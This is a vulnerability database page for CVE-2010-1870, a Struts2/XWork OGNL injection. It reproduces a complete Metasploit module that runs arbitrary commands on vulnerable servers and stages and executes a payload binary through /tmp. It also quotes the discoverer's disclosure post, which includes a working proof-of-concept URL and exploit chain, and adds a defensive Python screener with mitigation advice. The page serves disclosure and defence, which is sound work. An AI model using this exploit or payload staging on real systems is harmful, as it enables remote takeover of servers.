CVE-2010-1870 : Détail

25.21% V3
Network
Published: 2010-08-17 15:31 +00:00
Last modified: 2020-10-20 19:06 +00:00

CVE description

The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "#" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE-2008-6504.

CVE information

Metrics

Metric | Score | Severity | CVSS vector | Source
V2 | 5.0 | Medium | AV:N/AC:L/Au:N/C:N/I:P/A:N | [email protected]

EPSS

EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs; the percentile is thus a way to compare one CVE's EPSS score against the others.

Exploit information

Exploit Database EDB-ID: 17691

Publication date: 2011-08-18 22:00 +00:00
Author: Metasploit
EDB verified: Yes

```ruby
##
# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts < 2.2.0 Remote Command Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in
        Apache Struts versions < 2.2.0. This issue is caused by a failure to
        properly handle unicode characters in OGNL extensive expressions
        passed to the web server.

        By sending a specially crafted request to the Struts application it
        is possible to bypass the "#" restriction on ParameterInterceptors by
        using OGNL context variables. Bypassing this restriction allows for
        the execution of arbitrary Java code.
      },
      'Author'         =>
        [
          'bannedit',          # metasploit module
          'Meder Kydyraliev',  # original public exploit
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13586 $',
      'References'     =>
        [
          [ 'CVE', '2010-1870' ],
          [ 'OSVDB', '66280' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/14360/' ],
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Privileged'     => true,
      'Targets'        =>
        [
          [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],
          [ 'Linux Universal',   { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
        ],
      'DisclosureDate' => 'Jul 13 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', "" ]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ], self.class)
  end

  # Build the OGNL parameter names that (1) enable static method access on
  # #_memberAccess, (2) clear xwork.MethodAccessor.denyMethodExecution on
  # #context, and (3) call Runtime.exec with the supplied command. "#" is
  # written as the Java unicode escape \u0023 so the raw name passes the
  # ParametersInterceptor "#" check but is decoded by the OGNL parser.
  def execute_command(cmd, opts = {})
    uri = Rex::Text::uri_encode(datastore['URI'])
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(2)
    var_c = rand_text_alpha_lower(4)
    var_d = rand_text_alpha_lower(4)
    var_e = rand_text_alpha_lower(4)

    uri << "?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&"
    uri << "(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\"false\")))&"
    uri << "(#{var_b})((%27\\u0023#{var_d}.exec(\"CMD\")%27)(\\u0023#{var_d}\\u003d@java.lang.Runtime@getRuntime()))=1" if target['Platform'] == 'win'
    uri << "(asdf)(('\\u0023rt.exec(\"CMD\".split(\"@\"))')(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()))=1" if target['Platform'] == 'linux'
    uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

    vprint_status("Attempting to execute: #{cmd}")
    resp = send_request_raw({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    }, 5)
  end

  def windows_stager
    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    execute_cmdstager({ :temp => '.' })
    @payload_exe = payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def linux_stager
    # The ELF payload is base64-encoded, appended to a temp file line by line,
    # decoded on the target and executed. "tee -a" is required for the
    # append: plain "tee" would overwrite the file with every line.
    # (Rex::Text.encode_base64 emits a single line unless given a delimiter,
    # so the loop and the append only matter if the output is ever split.)
    cmds = "/bin/sh@-c@echo LINE | tee -a FILE"
    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(4+rand(4))

    execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
    base64.each_line do |line|
      line.chomp!
      # substitute into a copy: gsub! on the template itself would consume
      # LINE on the first iteration and resend that same line afterwards
      cmd = cmds.gsub(/LINE/, line)
      execute_command(cmd)
    end

    execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
    execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")
    execute_command("/bin/sh@-c@/tmp/#{file}")
    @payload_exe = "/tmp/" + file
  end

  def on_new_session(client)
    if target['Platform'] == 'linux'
      print_status("deleting #{@payload_exe} payload file")
      execute_command("/bin/sh@-c@rm #{@payload_exe}")
    else
      print_status("Windows does not allow running executables to be deleted")
      print_status("delete the #{@payload_exe} file manually after migrating")
    end
  end

  def exploit
    if not datastore['CMD'].empty?
      print_status("Executing user supplied command")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'linux'
      linux_stager
    when 'win'
      windows_stager
    else
      raise RuntimeError, 'Unsupported target platform!'
    end

    handler
  end
end
```
Exploit Database EDB-ID: 14360

Publication date: 2010-07-13 22:00 +00:00
Author: Meder Kydyraliev
EDB verified: No

Friday, July 9, 2010

CVE-2010-1870: Struts2/XWork remote command execution

Update Tue Jul 13 2010: Added proof of concept

The Apache Struts team has announced and uploaded, but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework, which fixes a vulnerability that I reported to them on May 31st 2010. The Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.

Introduction

Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:

  user.address.city=Bishkek&user['favoriteDrink']=kumys

into

  action.getUser().getAddress().setCity("Bishkek")
  action.getUser().setFavoriteDrink("kumys")

This is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.

NOTE: If you are using XWork's ParametersInterceptor or operate with the OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).

In addition to property getting/setting, OGNL supports many more features:

* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...

Since HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding method execution:

* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)
* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)

OGNL Context variables

To make it easier for developers to access various frequently needed objects XWork provides several predefined context variables:

* #application
* #session
* #request
* #parameters
* #attr

These variables represent various server-side objects, such as the session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection (XW-641) using Java's unicode String representation: \u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had no time to investigate this further.

CVE-2010-1870

Earlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:

* #context - OgnlContext, the one guarding method execution based on the 'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation

You can probably see the problem already. Using the XW-641 trick I was able to modify the values that were guarding Java method execution and run arbitrary Java code:

  #_memberAccess['allowStaticMethodAccess'] = true
  #foo = new java.lang.Boolean("false")
  #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  #rt = @java.lang.Runtime@getRuntime()
  #rt.exec('mkdir /tmp/PWNED')

The actual proof of concept had to use OGNL's expression evaluation when crafting the HTTP request. The PoC for this bug will be published on July 12 2010.

To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):

  http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

Fixing CVE-2010-1870

Struts2 users must upgrade to 2.2.0, which whitelists a set of characters that excludes the characters required to exploit this vulnerability. In cases where an upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly (usually A-z0-9_.'"[]); alternatively you can blacklist \()@ which are the characters required to exploit this bug.

Timeline

May 31st - email to [email protected] with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.
June 20th - 1-line fix committed.
June 29th - Struts 2.2.0 release voting process started and is still going...
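The write-up above turns on one detail: the ParametersInterceptor rejected "#" by looking at the raw parameter name, while the OGNL parser that evaluated the name later decoded Java unicode escapes, so "\u0023" sailed past the check and became "#". The example below is added here and is my own code, not from the post, the Struts project or the Metasploit module. It runs both kinds of check over parameter names taken from a query string: the old "no '#'" check, and a character allow-list in the spirit of the Struts 2.2.0 fix (the exact pattern is my assumption, not Struts' own expression). The query strings are constructed from the post's examples. It also demonstrates a caveat about the allow-list the post suggests: spelled "A-z" inside a regex character class, that range spans the ASCII run between 'Z' and 'a' and therefore admits the backslash that "\u0023" requires, so the allow-list here is written A-Za-z.

```python
"""Screen Struts-style parameter names for the CVE-2010-1870 bypass.

Added example, not code from the page, from Struts or from Metasploit.
Two checks are modelled:
  * naive_hash_check: the pre-fix rule, "reject if the raw name contains '#'",
    which never sees the '#' hidden in the Java unicode escape \\u0023;
  * allowlist_check: an allow-list in the spirit of the 2.2.0 fix (my own
    pattern, an assumption): only characters a property path needs, so
    '\\', '(', ')' and '@' never reach the OGNL parser at all.
"""
import re
from urllib.parse import parse_qsl

# Java/OGNL-style escape: a backslash, 'u', then four hex digits.
_JAVA_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Letters, digits, '_', '.', quotes and square brackets. Written A-Za-z on
# purpose: the range A-z also covers [ \ ] ^ _ ` (0x5B-0x60) and so would
# admit the backslash needed to write \u0023.
SAFE_PARAM_NAME = re.compile(r"^[A-Za-z0-9_.'\"\[\]]+$")


def decode_java_unicode(s: str) -> str:
    """Resolve \\uXXXX escapes the way a Java-style lexer (OGNL's) would."""
    return _JAVA_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)


def naive_hash_check(name: str) -> bool:
    """Pre-fix logic: accept unless the raw parameter name contains '#'."""
    return "#" not in name


def allowlist_check(name: str) -> bool:
    """Post-fix logic: accept only names built from allow-listed characters."""
    return SAFE_PARAM_NAME.fullmatch(name) is not None


def sloppy_range_admits(ch: str) -> bool:
    """Same allow-list but spelled A-z, to show which extra characters slip in."""
    return re.fullmatch(r"[A-z0-9_.'\"\[\]]+", ch) is not None


def screen_query(query: str):
    """Run both checks on every parameter name in a URL-encoded query string.

    Returns one dict per parameter: the raw (URL-decoded) name, the name
    after unicode-escape decoding (what OGNL would evaluate), each check's
    verdict, and a 'bypass' flag set when the old check passes a name that
    contains '#' once decoded.
    """
    results = []
    for raw_name, _value in parse_qsl(query, keep_blank_values=True):
        decoded = decode_java_unicode(raw_name)
        results.append({
            "raw": raw_name,
            "ognl_sees": decoded,
            "naive_ok": naive_hash_check(raw_name),
            "allowlist_ok": allowlist_check(raw_name),
            "bypass": naive_hash_check(raw_name) and "#" in decoded,
        })
    return results


# Constructed sample query strings, modelled on the write-up's examples.
BENIGN = "user.address.city=Bishkek&user['favoriteDrink']=kumys"
DIRECT_HASH = "#session['admin']=true"
POC = ("('\\u0023_memberAccess[\\'allowStaticMethodAccess\\']')(meh)=true"
       "&(aaa)(('\\u0023context[\\'xwork.MethodAccessor.denyMethodExecution\\']"
       "\\u003d\\u0023foo')(\\u0023foo\\u003dnew%20java.lang.Boolean(\"false\")))")

if __name__ == "__main__":
    for label, q in (("benign", BENIGN), ("direct #", DIRECT_HASH), ("PoC", POC)):
        for r in screen_query(q):
            print(f"{label:9} naive={r['naive_ok']!s:5} allowlist={r['allowlist_ok']!s:5} "
                  f"bypass={r['bypass']!s:5} ognl_sees={r['ognl_sees'][:48]}")
```

The "bypass" flag is the useful detection signal for access logs or a WAF: a name that the old check accepts but that contains "#" after escape decoding has no legitimate reason to exist. The allow-list is the structural fix, since it makes the escape, the parentheses and the "@" static-call syntax unrepresentable in a parameter name regardless of how the parser decodes them.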

Products mentioned

Configuration 0

Apache>>Struts >> Version 2.0.0

Apache>>Struts >> Version 2.0.1

Apache>>Struts >> Version 2.0.2

Apache>>Struts >> Version 2.0.3

Apache>>Struts >> Version 2.0.4

Apache>>Struts >> Version 2.0.5

Apache>>Struts >> Version 2.0.6

Apache>>Struts >> Version 2.0.7

Apache>>Struts >> Version 2.0.8

Apache>>Struts >> Version 2.0.9

Apache>>Struts >> Version 2.0.10

Apache>>Struts >> Version 2.0.11

Apache>>Struts >> Version 2.0.11.1

Apache>>Struts >> Version 2.0.11.2

Apache>>Struts >> Version 2.0.12

Apache>>Struts >> Version 2.0.13

Apache>>Struts >> Version 2.0.14

Apache>>Struts >> Version 2.1.0

Apache>>Struts >> Version 2.1.1

Apache>>Struts >> Version 2.1.2

Apache>>Struts >> Version 2.1.3

Apache>>Struts >> Version 2.1.4

Apache>>Struts >> Version 2.1.5

Apache>>Struts >> Version 2.1.6

Apache>>Struts >> Version 2.1.8

Apache>>Struts >> Version 2.1.8.1

References

http://www.exploit-db.com/exploits/14360
Tags: exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/41592
Tags: vdb-entry, x_refsource_BID
http://www.osvdb.org/66280
Tags: vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/59110
Tags: third-party-advisory, x_refsource_SECUNIA
http://seclists.org/fulldisclosure/2010/Jul/183
Tags: mailing-list, x_refsource_FULLDISC
http://securityreason.com/securityalert/8345
Tags: third-party-advisory, x_refsource_SREASON
http://seclists.org/fulldisclosure/2020/Oct/23
Tags: mailing-list, x_refsource_FULLDISC